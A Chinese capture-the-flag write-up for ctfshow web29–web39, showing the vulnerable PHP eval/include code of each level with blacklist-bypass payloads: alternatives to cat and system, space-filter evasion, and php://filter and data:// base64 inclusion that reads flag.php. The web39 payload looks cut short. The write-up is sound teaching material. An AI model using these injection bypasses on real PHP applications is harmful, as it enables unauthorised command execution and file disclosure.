参考博客:

https://blog.csdn.net/m0_62422842/article/details/125507970

https://www.cnblogs.com/amazingman113/p/16036313.html

Web29

/*

\# -*- coding: utf-8 -*-

\# @Author: h1xa

\# @Date:  2020-09-04 00:12:34

\# @Last Modified by:  h1xa

\# @Last Modified time: 2020-09-04 00:26:48

\# @email: h1xa@ctfer.com

\# @link: https://ctfer.com

*/

error_reporting(0);

if(isset($_GET['c'])){

  $c = $_GET['c'];

  if(!preg_match("/flag/i", $c)){

    eval($c);

  }

}else{

  highlight_file(__FILE__);

}

payload:?c=echo tac fl''ag.php;

过滤的很少可以用 nl(见下文),通配符之类的

nl 指令用于在输出文件内容时自动添加行号。与 cat -n 类似

Web30

<?php

/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-09-04 00:12:34

# @Last Modified by:   h1xa

# @Last Modified time: 2020-09-04 00:42:26

# @email: h1xa@ctfer.com

# @link: https://ctfer.com

*/

error_reporting(0);

if(isset($_GET['c'])){

    $c = $_GET['c'];

    if(!preg_match("/flag|system|php/i", $c)){

        eval($c);

    }

}else{

    highlight_file(__FILE__);

}

过滤掉system,这时我们可以看看有哪些可以代替system的:

​ (1)system()函数

​ 作用:调用shell来执行命令;返回命令的退出状态

​ (2)exec()函数(execl, execlp, execle, execv, execvp, execvpe

​ 作用:创建一个新的进程,并在新进程中执行命令

​ (3)其他:shell_exec()、passthru()、popen()、proc_open()、pcntl_exec()

​ (4)反引号

Web31

<?php

/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-09-04 00:12:34

# @Last Modified by:   h1xa

# @Last Modified time: 2020-09-04 00:49:10

# @email: h1xa@ctfer.com

# @link: https://ctfer.com

*/

error_reporting(0);

if(isset($_GET['c'])){

    $c = $_GET['c'];

    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){

        eval($c);

    }

}else{

    highlight_file(__FILE__);

}

过滤空格:%09 %0a(<> ${IFS} $IFS$9 {cat,fl*} %20这几个在这个题里不行)

绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq(vim有可能不行)

Web32

<?php

/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-09-04 00:12:34

# @Last Modified by:   h1xa

# @Last Modified time: 2020-09-04 00:56:31

# @email: h1xa@ctfer.com

# @link: https://ctfer.com

*/

error_reporting(0);

if(isset($_GET['c'])){

    $c = $_GET['c'];

    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){

        eval($c);

    }

}else{

    highlight_file(__FILE__);

}

  1. payload:?c=include%09$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

  2. data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg==

主要由于这个程序过滤了括号,导致很多函数没有办法使用,include可以无括号包含,然后就成为了文件包含类题

include包含内容不经过preg_match的过滤,所以只需要注意前面内容即可

;可以用?>进行绕过,用于闭合前面的内容

get的参数用1是为了绕过“过滤

值得注意的是:当使用php://filter/会将带有通配符的文件名作为普通文件名处理(例如:*.php它会寻找对应名称,而不会输出所有php后缀的文件)

之后几个就用伪协议就能过

web39

<?php

/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-09-04 00:12:34

# @Last Modified by:   h1xa

# @Last Modified time: 2020-09-04 06:13:21

# @email: h1xa@ctfer.com

# @link: https://ctfer.com

*/

//flag in flag.php

error_reporting(0);

if(isset($_GET['c'])){

    $c = $_GET['c'];

    if(!preg_match("/flag/i", $c)){

        include($c.".php");

    }

}else{

    highlight_file(__FILE__);

}

这个是在我们传入的c值之后加上.php,但是由于我们写的都进行了闭合,不会出现影响

payload:?c=data:text/plain,

web29~web39的更多相关文章

  1. ctfshow web入门部分题目 (更新中)

    CTFSHOW(WEB) web入门 给她 1 参考文档 https://blog.csdn.net/weixin_51412071/article/details/124270277 查看链接 sq ...

  2. ctf命令执行刷题

    web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i" ...

  3. 理解Docker(3):Docker 使用 Linux namespace 隔离容器的运行环境

    本系列文章将介绍Docker的有关知识: (1)Docker 安装及基本用法 (2)Docker 镜像 (3)Docker 容器的隔离性 - 使用 Linux namespace 隔离容器的运行环境 ...

  4. BUUCTF平台-web-边刷边记录-1

    1.WarmUp 思路很清晰,文件包含,漏洞点在代码会二次解码,只需注入一个?就可以使用../../进行路径穿越,然后去包含flag,flag路径在hint.php里面有 2.easy_tornado ...

  5. 【转】 linux下配置squid 服务器,最简单使用方式

    linux下配置squid 1.什么是squid Squid cache(简称为Squid)是一个流行的自由软件(GNU通用公共许可证)的代理服务器和Web缓存服务器.Squid有广泛的用途,从作为网 ...

  6. ctfshow web入门 命令执行 37-39

    37-39 基于 GET 传参的 include() 38.39 是 37 的变种 分析 伪协议常用于文件包含漏洞中 文件包含函数有:include.include_once.require.requ ...

  7. ctfshow web入门 命令执行 web29-36

    29-36 全是基于get传参执行 eval() 函数,均采用黑名单匹配,不同点在于黑名单的变化 web29 1 error_reporting(0); 2 if(isset($_GET['c'])) ...

随机推荐

  1. Trae和Cursor小斗法

    前情 自从AI IDE面世以来,网络上到处流传程序员要失业了,小白也能轻松完成程序开发了,某某0基础靠AI上架了苹果应用,平时工作也有偶尔用用AI工具的我,都觉得这些都是标题党文章不予理会的,直到看到 ...

  2. CentOS7脚本检测SpringBoot项目JAR包变化后自动重启

    #!/bin/bash # 文件目录 fileDir=/usr/local/project/back logDir=/usr/local/project/logs # 设置需要检测的文件路径 file ...

  3. go语言实现终端里的倒计时

    最近在更新系统的时候发现pacman的命令行界面变了,我有很久没更新过设备上的Linux系统了,所以啥时候变的不好说.但这一变化成功勾起了我的好奇心.新版的更新进度界面如下: 新的更新进度界面能同时显 ...

  4. 【由技及道】量子跃迁部署术:docker+jenkins+Harbor+SSH的十一维交付矩阵【人工智障AI2077的开发日志011】

    摘要: SSH密钥对构建的十一维安全通道 × Harbor镜像星门 × 错误吞噬者语法糖 = 在CI/CD的量子观测中实现熵减永动机,使容器在部署前保持开发与生产维度的叠加态 量子纠缠现状(技术背景) ...

  5. V8引擎静态库及其调用方法

    V8引擎静态库下载地址由于包含了x86和x64的debug和release静态库,所以资源较大,需要耐心下载. 案例编译工具:VS2019 v8开头的即为V8引擎静态库(附送其它开源静态库libuv. ...

  6. 基础命令:dd、tar、ln、find、逻辑符号、alisa别名、md5sun校验、lrzsz文件上传下载、wget

    目录 3.0 dd读取.转换并输出数据 3.1 压缩 (tar.zip).解压缩(tar xf.unzip) 3.2 ln软硬链接 3.2.1 软链接: 3.2.2 硬链接: 3.3 find文件查找 ...

  7. Linux SWAP交换分区应该设置多大?

    乾乾君子 2019-02-21 15:21:02 23370 收藏 34分类专栏: 杂记 文章标签: linux centos swap分区版权    Linux SWAP交换分区,就是我们课本说讲过 ...

  8. WIN2012域用户添加和批量添加工具

    WIN2012域用户添加和批量添加,不需要进行复杂的进电脑管理去添加 直接在软件上就可单个用户添加,可批量添加,并把指定的用户加入组 可以自定义组织单位,使用起来比较简单方便. 链接:https:// ...

  9. Jmeter压测数据库总结

    1.添加MySQL驱动 在测试计划里面添加,操作如下: MySQL驱动自行下载 2.添加线程组 选中测试计划,右键添加->线程(用户)->线程组,页面如下: 3.添加JDBC连接配置 选中 ...

  10. Java提交到MySQL数据库出现中文乱码

    1)使用文本或者链接地址写到代码中(不推荐)时,实例如下: jdbc:mysql://localhost:3306/tms?useUnicode=true&characterEncoding= ...